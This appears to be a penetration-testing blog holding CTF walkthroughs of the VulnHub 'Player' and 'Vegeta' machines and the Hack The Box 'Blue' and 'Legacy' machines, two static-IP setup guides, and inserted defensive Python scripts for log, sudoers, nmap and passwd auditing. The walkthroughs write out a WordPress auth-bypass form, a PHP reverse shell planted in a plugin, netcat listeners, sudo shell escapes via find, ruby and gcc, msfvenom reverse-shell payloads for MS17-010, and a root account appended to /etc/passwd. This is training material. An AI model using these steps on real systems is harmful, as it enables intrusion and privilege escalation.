How I took down the ‘Player’ machine from VulnHub


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access





You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0

Target Machine IP:

I will take a shortcut here, because I did this machine twice, once with nmap and once without it (but in a random way). I visited the IP and it showed a default Apache index file (even after running nmap, I was forced to visit the IP to check whether any website was hosted).

It was during lunch break, and since I bring my own lunch tiffin, I had around 40 minutes of leisure. So I read the index file (because apart from this only a MySQL server was running, and I thought that if it was a MySQL-related issue I would do it at home, since I could take my time after office hours).

Oops, guess what I found.

There is a folder named g@web at /var/www/html. I visited it and found that a WordPress website is running there.

Usually, I like to enumerate the usernames of a WordPress site by passing /?author=1, as shown in the screenshot below.

Yes, it revealed to me that there is a website username wp-local (if the developer didn’t reassign user IDs, it is quite certain that ID=1 is the admin user). And it also spat out a password hackNos@9012!!

I was very excited and tried the credentials, but it appears that the password is not for the user wp-local.

Since the website is WordPress, why not run wpscan.

wpscan --stealthy --url --plugins-detection aggressive -o wp-scan.log

If you read the highlighted area carefully, you will understand that the website is running the wp-support-plus-responsive-ticket-system plugin. The latest version is 9.1.2, and if you read the readme section just beneath that link, the currently running plugin version is 7.1.3.

By googling, I was directed to the corresponding exploit-db entry.

Yes, the selected lines are the PoC (proof of concept), or the exploit.

<form method="post" action="">
  Username: <input type="text" name="username" value="administrator">
  <input type="hidden" name="email" value="sth">
  <input type="hidden" name="action" value="loginGuestFacebook">
  <input type="submit" value="Login">
</form>

If you have read the exploit-db article carefully, you will understand that this vulnerability is due to incorrect usage of the wp_set_auth_cookie() function, because of which you don’t require a password to log in.

As soon as you enter, it will show a blank white page; don’t worry, just remove everything after {url}/wp-admin and you are in.

Usually, I like to hide my reverse shell in 404.php. It didn’t work, so I switched place and put the code in the plugin called Hello Dolly.
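From the defender’s side, the two steps above (walking /?author=N to harvest usernames, then editing a plugin or theme file from wp-admin to plant code) both leave traces in the web server’s access log. The following script is an added example, not part of the original post: it parses Apache combined-format lines and flags clients that probe several author IDs, plus any POST to the built-in plugin or theme editor. The log lines are constructed for the example; the /g@web path comes from the post, and /wp-admin/plugin-editor.php and /wp-admin/theme-editor.php are the standard WordPress editor endpoints.

```python
import re
from collections import defaultdict

# Constructed sample Apache access-log lines (combined format); not taken from the post.
# One client walks /?author=1,2,3 and later POSTs to the plugin editor.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Mar/2021:12:00:01 +0000] "GET /g@web/?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2021:12:00:02 +0000] "GET /g@web/author/wp-local/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2021:12:00:03 +0000] "GET /g@web/?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2021:12:00:04 +0000] "GET /g@web/?author=3 HTTP/1.1" 404 1234 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Mar/2021:12:05:00 +0000] "GET /g@web/?p=12 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2021:12:09:30 +0000] "POST /g@web/wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')
# Built-in WordPress editors that turn admin access into code written to disk.
EDITOR_PATHS = ('/wp-admin/plugin-editor.php', '/wp-admin/theme-editor.php')


def parse_line(line):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, enum_threshold=2):
    """Flag clients probing several ?author=N ids and any POST to the plugin/theme editor."""
    author_ids = defaultdict(set)
    editor_writes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = AUTHOR_RE.search(rec['path'])
        if m:
            author_ids[rec['ip']].add(int(m.group(1)))
        if rec['method'] == 'POST' and rec['path'].split('?', 1)[0].endswith(EDITOR_PATHS):
            editor_writes.append((rec['ip'], rec['path']))
    enumerators = {ip: sorted(ids) for ip, ids in author_ids.items() if len(ids) >= enum_threshold}
    return {'author_enumeration': enumerators, 'editor_writes': editor_writes}


if __name__ == '__main__':
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

Two caveats for anyone turning this into a real detection: wpscan’s --stealthy option used above randomises the User-Agent, so matching on the scanner’s UA string is unreliable and request patterns are the better signal; and the editor-write finding is only possible because file editing was left enabled, which `define('DISALLOW_FILE_EDIT', true);` in wp-config.php switches off.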

By the way, you can get the reverse shell from the pentestmonkey website or GitHub page. Besides, if you don’t want to download it and you are using Kali Linux, you can copy the shell from /usr/share/webshells/php/php-reverse-shell.php to the place of your choice.

And modify the reverse IP address and port number.

Then you need to set up your (Kali, or attacker) machine to receive the reverse connection

nc -lvp 1234

Then all you need to do is activate the Hello Dolly plugin

Guess what? You got a reverse connection on your Kali Linux Machine

Usually at this stage I like to run the which python or which python3 command, because if it shows something like /usr/bin/python2 or /usr/bin/python3, that means Python is available. Then I use it to make the shell interactive.

which python3 
python3 -c "import pty;pty.spawn('/bin/bash')";
export TERM=xterm     #this command help us to make the clear command work, which I really like
id  # to know which user we are running in

Usually you can run a command like cat /etc/passwd to know all the users, but this time I got a little lazy

See, we got usernames

1. hackNos-boat
2. hunter
3. security

The reason why I am a little concerned about usernames is that we got a password hackNos@9012!! during the enumeration or information gathering stage.

I tried them one by one, and the username security accepted the password hackNos@9012!!

I was very happy. I ran a few commands like find to check whether any SUID or SGID binaries were there, but didn’t get anything.

Then guess what?

sudo -l 

Then I quickly did a little shopping at GTFOBins

sudo -u hackNos-boat find . -exec /bin/sh \; -quit

sudo -l

sudo -u hunter ruby -e 'exec "/bin/sh"'

sudo -l

sudo gcc -wrapper /bin/sh,-s .
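The three sudo -l hops above are a chain of rules that each hand a shell-capable binary to the next account. An administrator reviewing /etc/sudoers wants to see that chain before an attacker does, so here is an added example (not from the post) that parses sudoers user-spec lines and searches for a path from a given account to root through such rules. The sudoers lines are constructed to mirror the hops the post took; the post only shows sudo -l output, not the rule file, and the watchlist holds just the three binaries the post used.

```python
import os
import re
from collections import deque

# The three binaries the post escalates through; extend this set from GTFOBins for a real audit.
SHELL_CAPABLE = {'find', 'ruby', 'gcc'}

# Constructed sudoers lines (the post only shows `sudo -l`, not the rule file).
SAMPLE_SUDOERS = """\
# constructed example, not the machine's real /etc/sudoers
Defaults env_reset
security ALL=(hackNos-boat) NOPASSWD: /usr/bin/find
hackNos-boat ALL=(hunter) NOPASSWD: /usr/bin/ruby
hunter ALL=(ALL) NOPASSWD: /usr/bin/gcc
ops ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)


def parse_sudoers(text):
    """Turn user-spec lines into one dict per command (aliases and Defaults are skipped)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith(('Defaults', '%', 'User_Alias', 'Cmnd_Alias')):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(user:group)": only the user part matters here; an empty spec means root.
        runas = m.group('runas').split(':', 1)[0].strip() or 'root'
        for cmd in m.group('cmds').split(','):
            cmd = cmd.strip()
            rules.append({
                'user': m.group('user'),
                'runas': runas,
                'binary': os.path.basename(cmd.split()[0]),
                'cmd': cmd,
                'nopasswd': 'NOPASSWD:' in m.group('tags'),
            })
    return rules


def shell_capable_rules(rules):
    """Rules whose command can be turned into an interactive shell as the run-as user."""
    return [r for r in rules if r['binary'] in SHELL_CAPABLE]


def escalation_path(rules, start, goal='root'):
    """Breadth-first search over accounts: each shell-capable rule is an edge user -> runas.
    Returns the hop list [(user, binary, next_user), ...] that reaches `goal`, or None."""
    edges = {}
    for r in shell_capable_rules(rules):
        edges.setdefault(r['user'], []).append((r['binary'], r['runas']))
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        user, path = queue.popleft()
        if user == goal:
            return path
        for binary, runas in edges.get(user, []):
            nxt = goal if runas == 'ALL' else runas  # (ALL) includes the goal account
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(user, binary, nxt)]))
    return None


if __name__ == '__main__':
    rules = parse_sudoers(SAMPLE_SUDOERS)
    for r in shell_capable_rules(rules):
        print(f"{r['user']} -> {r['runas']} via {r['cmd']} (NOPASSWD={r['nopasswd']})")
    print('path from security:', escalation_path(rules, 'security'))
```

Run against a real sudoers file (and the drop-ins under /etc/sudoers.d), the interesting output is not a single risky rule but a non-empty path: each hop on its own looked like a narrow grant, and only the composition reaches root.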

We got root now!!

Now we need to find the flags. For the user flag... I again did a lazy step lol

cd home;ls -lah

cat hunter/user.txt # we got the user flag!!

For root flag,

cat /root/root.txt


That’s all guys…

I was writing this blog from around 5:15 PM and completed it at 6:16 PM. Wish you all a productive time too 🙂





How to set up a static IP address on Ubuntu Server 20.04


sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
version: 2
renderer: networkd 
dhcp4: true
dhcp4: no
dhcp6: no
addresses: [,]
addresses: [,


sudo netplan apply 

How to set up a static IP address on RHEL 8 or CentOS

Although there are many benefits of assigning a static IP address to a machine, it really helps me to stay organized and monitor my machines more conveniently. Besides, it has become a habit that whenever I have to access machines in VMware or VirtualBox, I like to SSH to them from my host machine. So, in this article I will share how to set a static IP address on your machine without using any graphical tools (because 99.9% of the servers I have worked on have no GUI; moreover, I enjoy the power it offers).


Assign a static IP address using the following information (you can alter it based on your host-only network IP address)
IP address:
Default Gateway:
Netmask: 255.255.255.0

I ran ifconfig on my machine. You can clearly see that I have two network interface (ifname) slots and one is empty (i.e. ens192).


First, let’s run

nmcli c s

nmcli is the network management tool (or package) we are going to use (although nmtui is a great option, it may not be available on all servers)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes, the above command helped us confirm our understanding, which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses ipv4.dns ipv4.method manual


Although you can understand what each flag does by simply running man nmcli, let me give a little explanation just to get a grasp of the concept for myself.

We are adding (add) a new connection named (con-name) lab on the network interface (ifname) ens192, which connects automatically, with IP address (and netmask) using the nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t change, unlike what we experience with our home devices (which are on DHCP).

nmcli connection up lab

It appears that the new connection is ready even though we haven’t run the aforementioned command; however, I like to run it (because I am afraid that may not be the case in an exam environment or on a real server that you have to manage).

To verify the result…


We got the IP address and netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did not get the Gateway configured.

route -n

It is indeed a blessing in disguise because we got the opportunity to learn how to edit the value in case we need to in the future. I know the command has something to do with edit, so let me quickly run man nmcli

The above screenshot is nothing but the output of the man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you with an interactive shell. You have to choose the set option


then press q to exit and save.

Method 2 (referred from this site)

I really like this command more. It’s simple and easy to get the job done

nmcli connection modify lab ipv4.gateway

To verify:

route -n

The combined output is in the screenshot

Finally, we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfectly, and just to confirm the Gateway to you, I enclosed the result here.

route -n



Taking down Blue (a Windows machine) without using Metasploit

Today I am going to take down a machine called ‘Blue’. It’s a Windows 7 based machine. I didn’t expect that I could pwn the machine quite so easily… Anyway, here is my walkthrough of it. By the way, it is not necessarily the sole way to compromise the machine. Ok, enough said, let’s do some work…

nmap -sC -sV -oN nmap1.log
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -oN smb-vuln.log
Nmap scan report for
Host is up (0.43s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I found this repository, which has everything you need for MS17-010 (aka EternalBlue)

git clone

cd MS17-010

We need to develop a simple exploit (which creates a reverse connection from the Windows 7 machine back to our Kali Linux machine). Remember, we are never going to depend on the Meterpreter shell, which is not allowed in the exam; therefore, in lieu of the aforementioned shell, I am going to use the shell_reverse_tcp payload.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f exe > blue.exe

I don’t think you need me to explain what those options do because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit, I didn’t use that; instead I manually searched for an exploit on exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/ .

Then we need to modify the exploit code. (I have highlighted the line that needs to be modified)

You need to place the guest username (perhaps you can see it from the nmap result, or the following command can help you understand that there is a guest user). By the way, there are two ways to fill in the guest user. One is the conventional way of entering the username as guest, and the other is simply filling the place with // (yes, two forward slashes between the quotes).

Once the modification is done, follow these steps..

I usually split the terminal using tmux, and in one shell you need to wait for the reverse connection from the Windows machine.

nc -lvp 1234

And on another shell


Once you are successful, you will get the system32 prompt like the screenshot below..

User flag (remember, the type command in Windows is the same as cat in Linux – I know this claim is a stretch, but let us go with it for the time being)

Finally the root flag…


Taking down Legacy (a Windows machine) without using Metasploit

Hello guys,
Today I am going to take down one simple box from Hack The Box. Recently I purchased VIP lab access. By the way, the machine is called Legacy and it’s a Windows machine.

This is my first write-up of machines from that lab.

Since we already have the machine IP address (it’s shown in the web portal), let’s check what ports are open and what services are running..


Machine IP:
Kali Linux :

1. To get the user flag
2. To get the root flag

Information Gathering Phase:

nmap -sC -sV -Pn
Nmap scan report for
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

From the above result, we can conclude that the target machine is running Windows XP and has ports 139 and 445 open. Besides, it is running a Samba server.

If you want to know more, you can also run the above command with the -v option. (However, the attached screenshot was the result of the command without the -v option)

nmap -sC -sV -v -p139,445 -oN nmap.log -Pn

Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can help us get better vulnerability details, and it will also recommend related exploits if it has any.

nmap --script smb-vuln* -oN nmap_smb_vul.log -Pn
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| Disclosure date: 2008-10-23
| References:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| Disclosure date: 2017-03-14
| References:

You can clearly see that it has suggested two exploits; however, since the first exploit has some issue (which I colored red), I am going to use the second exploit. (Note: I must share with you that this is not an absolute approach, because sometimes minor changes to the exploit might make it work, so try to fix the issues of the first exploit if time permits.)
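The smb-vuln-* output above (and the earlier one from the Blue scan) is what a defender triaging a scan has to read, and it mixes three different outcomes: a check that ran and found nothing (false), a check that could not run (ERROR or an NT_STATUS code, which is not a clean result), and an actual finding. The parser below is an added example, not part of the post or of nmap: it turns that host-script section into a per-script record with CVE ids, risk factor and disclosure date, and lists what needs follow-up. The sample input is the Legacy output above, trimmed; a State: line, which full nmap output includes, is honoured when present.

```python
import re

# Host-script section of the Legacy scan above, reproduced as sample input (abridged as in the post).
SAMPLE_NMAP = """\
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| IDs: CVE:CVE-2008-4250
| Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| Disclosure date: 2017-03-14
"""

HEADER_RE = re.compile(r'^\|_?\s*(?P<script>smb-vuln-[\w-]+):\s*(?P<rest>.*)$')
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,}')
STATE_RE = re.compile(r'^State:\s*(\S+)')


def parse_smb_vuln(text):
    """Map each smb-vuln-* script to {'status', 'cves', 'risk', 'disclosed'}.

    One-line `false` means the check ran and found nothing; ERROR/NT_STATUS means the check
    did not complete. A multi-line block is a finding: a `State:` line decides if present,
    otherwise the block is recorded as 'reported'."""
    results = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        h = HEADER_RE.match(line)
        if h:
            script, rest = h.group('script'), h.group('rest').strip()
            entry = {'status': 'reported', 'cves': [], 'risk': None, 'disclosed': None}
            if rest == 'false':
                entry['status'] = 'not_vulnerable'
            elif rest.startswith(('ERROR', 'NT_STATUS')):
                entry['status'] = 'error'
            results[script] = entry
            current = script if rest == '' else None  # only a bare header opens a block
            continue
        if current is None or not line.startswith('|'):
            continue
        body = line.lstrip('|_ ').strip()
        entry = results[current]
        for cve in CVE_RE.findall(body):
            if cve not in entry['cves']:
                entry['cves'].append(cve)
        if body.startswith('Risk factor:'):
            entry['risk'] = body.split(':', 1)[1].strip()
        elif body.startswith('Disclosure date:'):
            entry['disclosed'] = body.split(':', 1)[1].strip()
        s = STATE_RE.match(body)
        if s:
            entry['status'] = 'vulnerable' if s.group(1).startswith('VULNERABLE') else 'not_vulnerable'
    return results


def findings(results):
    """Scripts that need patching or a re-run, most severe first, then by name."""
    order = {'vulnerable': 0, 'reported': 1, 'error': 2}
    return sorted((name for name, e in results.items() if e['status'] in order),
                  key=lambda n: (order[results[n]['status']], n))


if __name__ == '__main__':
    parsed = parse_smb_vuln(SAMPLE_NMAP)
    for name in findings(parsed):
        e = parsed[name]
        print(f"{name}: {e['status']} cves={e['cves']} risk={e['risk']} disclosed={e['disclosed']}")
```

Keeping the errored script in the follow-up list is deliberate: on this host the ms10-061 check failed rather than passed, and a report that silently drops it would overstate how much of the SMB attack surface was actually tested.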

Although I found many exploits regarding MS17-010, I am going to do it without using Metasploit (which is a powerful automation framework). So let’s do some shopping online.

We are going to clone a GitHub repository… (there will be many GitHub accounts having the exploit details of MS17-010, but we need one with a “send script” to send the exploit from our host machine (Kali Linux) to the remote machine (Windows machine). Since many GitHub repositories don’t have the script, I am emphasizing it. Perhaps if you read further you will understand its importance)

git clone

cd MS17-010

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

I was a little skeptical about using msfvenom at the beginning, as in the OSCP exam we are allowed to use Metasploit only twice (and my plan is not to use it at all). Nevertheless, after reading a couple of blogs by senior OSCPians, I understood that we can use msfvenom, and they discouraged using Meterpreter.

-p payload 
LHOST localhost 
LPORT Local Port 

I might need to explain a little regarding EXITFUNC=thread
- This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.
- The thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread, and exiting this thread results in a working application/system (clean exit).
- To know more, kindly visit this link

-f output format 
-a architecture 
-o output file and path

If you have observed carefully, you might have noticed that our exploit ms17-010.exe (which uses the payload windows/shell_reverse_tcp) will provide us a reverse connection to our Kali Linux machine (or local host) on LPORT 1234.

Therefore, I will wait for a reverse connection on my LHOST at LPORT 1234.

nc -lvp 1234

And on another terminal (remember to cd into the MS17-010 folder if you are freshly opening a terminal), run the following command. (By the way, I highly recommend using tmux to split the terminal and enhance your productivity)

python ms17-010.exe

Yes, if you are successful, on your terminal (the one listening on port 1234, which will get the reverse connection) you will see something like the following screenshot. (Focus on the highlighted area)

I will not bore you with my English (Tibetish lol), so I have attached the following steps as screenshots.

That’s all guys … See you in the next post 🙂

My approach to Vegeta Machine


Target Machine IP Address:  
My Machine IP Address:


Boot to Root




You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0

nmap -sC -sV -p- -oN nmap.log

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))

I checked the source code and ran exiftool on the image but didn’t get a good result, so I will not write those processes here (afraid it may bog you down with rabbit holes). However, something interesting is showing in robots.txt

Note: Don’t just stop there; I missed it once.. look at the line number, something must be at the bottom


Yes, this is base64. We need to decode it.

If you wonder why I did double decoding, you might understand it by doing it with single decoding. Because the output of the base64-decoded message is another base64-encoded text, I did it twice.

The decoded file is actually a PNG file; do you see the PNG at the top of the screenshot?

I have redirected the output and named the file decoded.png

It is a QR code. Now I need to do a little shopping: find an online tool that could read the code and spit out the message, if it has any… By the way, I tried my mobile QR reader and already got the message; however, let’s do it the usual way…

I am going to use this tool to decode the message:

Password:: topshellv

However, I did scan with Nikto and Gobuster; both gave me some information, nevertheless, so far it appears to be another rabbit hole to me 🙂

As you can see very well, the directory redirects somewhere (not known yet; I am planning to run Burp Suite to look into it.)

In the Nikto result, there is a link which intrigued me; nevertheless, I am not sure whether it is again a rabbit hole, however, let’s keep it in our notes.

I must confess here that I was not able to get anything that could be of use. So, I had to peek at other people’s writeups. The author of the writeup used another custom wordlist which is not in the list of directory wordlists we normally use. Therefore, I think we really need to keep in mind that if a scanner finds nothing, that doesn’t mean nothing is there.

Actually, I could add the word bulma to the dictionary and act as if I found the directory using the scanner, but I don’t think that is the way.

Anyway, let’s proceed with the directory

I am impressed with this audio file because it contains Morse code. (I don’t know how to read Morse code manually; however, we can find a tool for that)

Tool to decode Morse audio files: Click Here.

We got username: trunks 
password: u$3r

If you run this command, you will get to know which (system) files you could write to (or modify).

find / -writable -type d 2>/dev/null

There were so many files that I could edit. I did a quick brush through. However, the last file attracted me the most.


Let’s modify this file using the findings…

echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd 
which means we added a user named Tom whose password is Password@973

su Tom 
cat root.txt
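The trick above works only because /etc/passwd was writable and because login still honours a password hash placed in the second field of a passwd entry. Both conditions are cheap to check, so here is an added example (not from the post) of a small audit: it parses passwd-format text, flags UID 0 accounts other than root, flags entries that carry a hash instead of the `x` that defers to /etc/shadow, flags shared UIDs, and separately reports whether the real file is group- or world-writable. The sample excerpt is constructed, with the post’s appended Tom line as its last entry.

```python
import os
import stat

# Constructed /etc/passwd excerpt; the last line is the entry the post appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

# Password-field values that mean "no usable hash is stored here".
LOCKED = {'x', '*', '!', '!!', ''}


def parse_passwd(text):
    """Return (entries, malformed_line_numbers); each entry is (name, passwd_field, uid, gid, shell)."""
    entries, malformed = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append(lineno)
            continue
        name, pw, uid, gid, _gecos, _home, shell = fields
        entries.append((name, pw, int(uid), int(gid), shell))
    return entries, malformed


def audit_passwd(text):
    """Return a sorted list of (account, issue) pairs for the passwd-format text."""
    entries, malformed = parse_passwd(text)
    issues = [(f'line {n}', 'malformed entry') for n in malformed]
    first_owner = {}  # uid -> first account seen with it
    for name, pw, uid, _gid, _shell in entries:
        if uid == 0 and name != 'root':
            issues.append((name, 'uid 0 account other than root'))
        if pw not in LOCKED:
            issues.append((name, 'password hash stored in /etc/passwd instead of /etc/shadow'))
        if uid in first_owner and uid != 0:  # uid 0 duplicates are already reported above
            issues.append((name, f'uid {uid} shared with {first_owner[uid]}'))
        first_owner.setdefault(uid, name)
    return sorted(issues)


def passwd_writable_by_others(path='/etc/passwd'):
    """True if group or world can write the file: the precondition the post relies on."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == '__main__':
    for account, issue in audit_passwd(SAMPLE_PASSWD):
        print(f'{account}: {issue}')
    if os.path.exists('/etc/passwd'):
        print('/etc/passwd writable by group/other:', passwd_writable_by_others())
```

On a healthy system audit_passwd(open('/etc/passwd').read()) returns an empty list and passwd_writable_by_others() is False; either result changing is worth an alert, since the write itself is a single append that leaves no trace in sudo or auth logs.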

That’s it, guys… if you don’t like to enumerate manually, you can use a tool to enumerate the box for you…

Additional Note:

I uploaded to our target machine from my Kali machine using SimpleHTTPServer (by the way, in order to save some time, I aliased the command to up).